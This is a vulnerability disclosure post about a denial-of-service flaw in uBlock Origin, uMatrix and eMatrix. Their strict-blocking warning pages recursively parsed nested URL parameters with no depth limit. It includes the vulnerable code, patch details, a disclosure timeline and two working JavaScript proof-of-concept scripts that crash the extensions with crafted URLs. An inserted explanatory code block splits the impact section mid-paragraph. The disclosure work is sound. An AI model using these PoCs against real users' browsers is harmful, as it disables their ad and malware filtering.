https://github.com/vtriolet/writings/blob/main/posts/2021/ublock_origin_and_umatrix_denial_of_service.adoc

vtriolet / writings: posts/2021/ublock_origin_and_umatrix_denial_of_service.adoc
Latest commit fa5a1c7 (Jul 16, 2021), "Remove uMatrix mitigations": The previous mitigations were incomplete and potentially misleading.

= uBlock Origin (and uMatrix) DoS with strict-blocking filter and crafted URL

== Overview

uBlock Origin (uBO) is a browser extension that blocks ads, security risks, privacy risks, and other web annoyances.
One of its features is "strict blocking," which prevents all connections, including direct navigations, to resources that match strict filters. Strict filters are most often used to block sites that perform affiliate redirects, serve malware, or are otherwise undesirable to visit. They are typically applied at the domain level (e.g., googlesyndication.com) and tend to resemble entries in hosts files, though they can also target more specific resources.

Strict blocking works by opening a warning page that provides information about the blocked resource, including its URL and the filter that prevented the resource from loading. The warning page also displays query parameters from the blocked URL to help users bypass redirect tracking. In earlier versions of uBO, these parameters were parsed recursively and added to the DOM without any depth checks, which could lead to extension crashes and memory exhaustion, depending on the browser and hardware. uMatrix and eMatrix, a fork of uMatrix compatible with Pale Moon, share similar code for displaying parsed URL parameters.

Users should upgrade to uBO 1.36.2 and eMatrix 4.4.9 to receive fixes for this security vulnerability, which affects the default configurations of both extensions. The uBO (Legacy) extension^[1] has a separate release process and is still vulnerable. uMatrix remains unpatched and unmaintained.

== Discussion

I discovered this bug while browsing the uBO codebase, which was a bit surprising given how basic the finding is. Even more surprising is that this vulnerability seems to have existed in uBO since 2015^[2] (and in uMatrix since 2017^[3]). Perhaps the extension has not received as much attention from security researchers as I'd expected, given its popularity and its security- and privacy-related functionality?
== Vulnerability

Here is the vulnerable code from uBO 1.36.0:

.uBlock/src/js/document-blocked.js
[source,javascript]
----
const renderParams = function(parentNode, rawURL) {
    const a = document.createElement('a');
    a.href = rawURL;
    if ( a.search.length === 0 ) { return false; }
    let pos = rawURL.indexOf('?');
    const li = liFromParam(
        vAPI.i18n('docblockedNoParamsPrompt'),
        rawURL.slice(0, pos)
    );
    parentNode.appendChild(li);
    const params = a.search.slice(1).split('&');
    for ( const param of params ) {
        let pos = param.indexOf('=');
        if ( pos === -1 ) {
            pos = param.length;
        }
        const name = safeDecodeURIComponent(param.slice(0, pos));
        const value = safeDecodeURIComponent(param.slice(pos + 1));
        const li = liFromParam(name, value);
        if ( reURL.test(value) ) {
            const ul = document.createElement('ul');
            renderParams(ul, value); <1>
            li.appendChild(ul);
        }
        parentNode.appendChild(li);
    }
    return true;
};
----
<1> `renderParams` is called recursively without taking into account the current nesting level. This allows for repeated allocations that can cause resource exhaustion on memory-constrained hardware and extension crashes in Chrome.

For reference, here is what the warning page looks like in uBO 1.36.0 with some nested parameters displayed:

[Figure 1. uBO's strict-blocking warning page. The page displays a URL that contains a few levels of nested parameters and the parsed representations of those parameters.]

== Impact and scope

The strict-blocking warning page is only displayed when direct navigations are blocked. This means that malicious hosts would need to induce users to trigger a navigation somehow, such as by clicking a link. iframes are classified as sub-documents and do not trigger the warning page, which should make it harder for malicious hosts to exploit this vulnerability in the background.

When uBO (or uMatrix) crashes, users are left without filtering protection until the extension is reloaded.
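The recursion marked at <1>, and the depth cap that uBO 1.36.2 later adopted (see "uBO and eMatrix patches" below), can be measured without a browser. The following is an added example written for this page, not uBO's own code: it models `renderParams` as a plain object tree instead of `<li>`/`<ul>` elements so that the number of rendered nodes and the nesting depth can be counted, and it takes the maximum nesting depth as a parameter. The `reURL` pattern, the node shape, and the helpers `craftURL`, `countNodes`, `deepestLevel` and `compare` are assumptions made for this example; the cap is modelled as two nested levels beneath the top-level parameters, which may not match the exact boundary in uBO's patched code.

```javascript
// Added example, not uBO's code: a DOM-free model of renderParams so the
// effect of a crafted URL on node count and nesting depth can be measured.
// The reURL pattern is an assumption; uBO's own regular expression is not
// reproduced here.
const reURL = /^https?:\/\//;

function safeDecodeURIComponent(s) {
  // A malformed percent-escape must not abort rendering of the warning page.
  try { return decodeURIComponent(s); } catch (e) { return s; }
}

// Parse the query of rawURL into {name, value, children} nodes. Values that
// are themselves URLs are parsed again, as uBO does, but only while
// depth < maxDepth. maxDepth = Infinity reproduces the pre-1.36.2 behaviour.
function renderParams(rawURL, maxDepth, depth = 0) {
  const qpos = rawURL.indexOf('?');
  if (qpos === -1) return [];
  const search = rawURL.slice(qpos + 1);
  if (search.length === 0) return [];
  const nodes = [];
  for (const param of search.split('&')) {
    let eq = param.indexOf('=');
    if (eq === -1) eq = param.length;
    const node = {
      name: safeDecodeURIComponent(param.slice(0, eq)),
      value: safeDecodeURIComponent(param.slice(eq + 1)),
      children: [],
    };
    // The depth check is the fix; without it every nested URL recurses.
    if (reURL.test(node.value) && depth < maxDepth) {
      node.children = renderParams(node.value, maxDepth, depth + 1);
    }
    nodes.push(node);
  }
  return nodes;
}

// Number of nodes rendered (each would be an <li> on the real warning page).
function countNodes(nodes) {
  return nodes.reduce((n, nd) => n + 1 + countNodes(nd.children), 0);
}

// Deepest nesting level reached; top-level parameters are level 0, -1 if none.
function deepestLevel(nodes, depth = 0) {
  let deepest = -1;
  for (const nd of nodes) {
    deepest = Math.max(deepest, depth, deepestLevel(nd.children, depth + 1));
  }
  return deepest;
}

// The crafted URL from the post's uBO PoC: a strict-blocked host whose
// parameter value is a chain of n self-referencing URLs.
function craftURL(n) {
  return 'http://bet365.com/?affiliate=' + 'http://a?a='.repeat(n);
}

const UNBOUNDED = Infinity;        // pre-1.36.2: no limit
const UBO_1_36_2_LIMIT = 2;        // 1.36.2: 2 nested levels (assumed boundary)

// Node count for the same crafted URL with and without the cap.
function compare(n) {
  const url = craftURL(n);
  return {
    unbounded: countNodes(renderParams(url, UNBOUNDED)),
    capped: countNodes(renderParams(url, UBO_1_36_2_LIMIT)),
  };
}

console.log(JSON.stringify(compare(1000)));
```

Run with `node`: `compare(1000)` returns `{ unbounded: 1001, capped: 3 }`. The unbounded figure grows by one node (and one recursion frame) per repetition of `http://a?a=`, which is why the PoC below needs only a string `repeat()` to exhaust memory or the call stack; the capped figure stays at three nodes however long the URL is, while still showing the first two levels of nested parameters that the feature exists for.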
This introduces the possibility of undesired traffic flowing to and from the user's browser.

I tested three browsers, Firefox, Chrome, and Pale Moon, and only noticed extension crashes in Chrome. Other browsers that uBO supports, such as Opera and Edge, were not tested and may exhibit different behavior.

The vulnerability affects standard configurations of uBO, uMatrix, and eMatrix because each extension enables filter lists that contain thousands of strict filters by default.

== uBO and eMatrix patches

uBO 1.36.2 restricts parameter-nesting to 2 levels to fix the bug^[4], and eMatrix 4.4.9 restricts parameter-nesting to 3 levels to fix the same issue^[5].

== uMatrix mitigations

The uMatrix repository was archived in September 2020^[6], and the last stable uMatrix release was in September 2019^[7]. Until now, I've been treating uMatrix similarly to how I treated TrueCrypt after its development had stopped: unmaintained but still trustworthy in the absence of known vulnerabilities^[8]. I may have to rethink my default stance for unmaintained security-related software going forward.

Edit: This post previously included mitigations that were incomplete and potentially misleading for users with customized rules. As a result, I no longer feel comfortable making general recommendations for securing uMatrix installations, if that is indeed possible. I apologize for any confusion that I've caused, especially because some of the flawed mitigations have been quoted elsewhere.

== POCs

=== uBO

[source,javascript]
----
// bet365.com is used because uBO enables EasyList by default and because
// EasyList contains this entry: ||bet365.com/*?affiliate=$document
let repetitions = 8000;
if (navigator.userAgent.includes('Chrome')) {
    // Lower the number of repetitions in Chrome to prevent
    // a 'Maximum call stack size exceeded' exception
    repetitions = 3000;
}
const url = 'http://bet365.com/?affiliate=' + 'http://a?a='.repeat(repetitions);
window.location = url;
// Notice the browser eating CPU and memory. In Chrome, uBO eventually crashes
// and must be reloaded to work again.
----

=== uMatrix and eMatrix

[source,javascript]
----
// googleadservices.com is used because uMatrix and eMatrix enable Peter Lowe's
// tracking list by default and because the list contains this entry:
// 127.0.0.1 googleadservices.com
let repetitions = 8000;
if (navigator.userAgent.includes('Chrome')) {
    // Lower the number of repetitions in Chrome to prevent
    // a 'Maximum call stack size exceeded' exception
    repetitions = 3000;
} else if (navigator.userAgent.includes('PaleMoon')) {
    // Pale Moon can actually handle more repetitions than this,
    // but its memory usage becomes excessive (>10GB)
    repetitions = 18000;
}
const url = 'http://googleadservices.com/?a=' + 'http://a?a='.repeat(repetitions);
window.location = url;
// Notice the browser eating CPU and memory. In Chrome, uMatrix eventually crashes
// and must be reloaded to work again.
----

== Timeline

* 2021-07-05 - I emailed gorhill (the author of uBO and uMatrix) my findings
* 2021-07-06 - gorhill pushed a fix for uBO and tagged 1.36.2^[9]
* 2021-07-06 - I emailed vannilla (the maintainer of eMatrix) my findings
* 2021-07-06 - vannilla pushed a fix for eMatrix and tagged 4.4.9^[10]
* 2021-07-06 - uBO 1.36.2 became available on the Chrome and Firefox add-ons sites
* 2021-07-07 - uBO 1.36.2 became available on the Opera add-ons site
* 2021-07-11 - eMatrix 4.4.9 became available on the Pale Moon add-ons site after a beta-testing period
* 2021-07-14 - I published this post

== Acknowledgments

Thanks to gorhill for fixing the issue in uBO, preparing a release, and creating software that has improved daily web-browsing for many users. Thanks to vannilla for fixing the issue in eMatrix and preparing an out-of-band release. Thanks to nikrolls for submitting uBO 1.36.2 to the Edge add-ons site. Thanks to JustOff for agreeing to prepare a future uBO (Legacy) release that addresses the vulnerability.
== References

* Documentation for uBO's strict-blocking feature
* Documentation for uMatrix's strict-blocking feature

'''

1. A release of the uBO (Legacy) extension is forthcoming.
2. Strict-blocking support was added to uBO in commit a4b4bc and was based on discussion in the issue tracker. Support for displaying parsed URL parameters was added later in commit 1d5a59 and was based on a feature request.
3. uBO's support for displaying parsed URL parameters was ported to uMatrix in commit 3f8168.
4. The uBO vulnerability was fixed in commit 365b20.
5. The eMatrix vulnerability was fixed in commit 42869a.
6. gorhill commented about archiving the uMatrix repository in September 2020.
7. The last stable release of uMatrix, 1.4.0, was tagged on September 5, 2019.
8. I eventually migrated away from TrueCrypt after an unpatched vulnerability was discovered.
9. uBO 1.36.2 was tagged shortly after notification of the vulnerability.
10. eMatrix 4.4.9 was tagged shortly after notification of the vulnerability.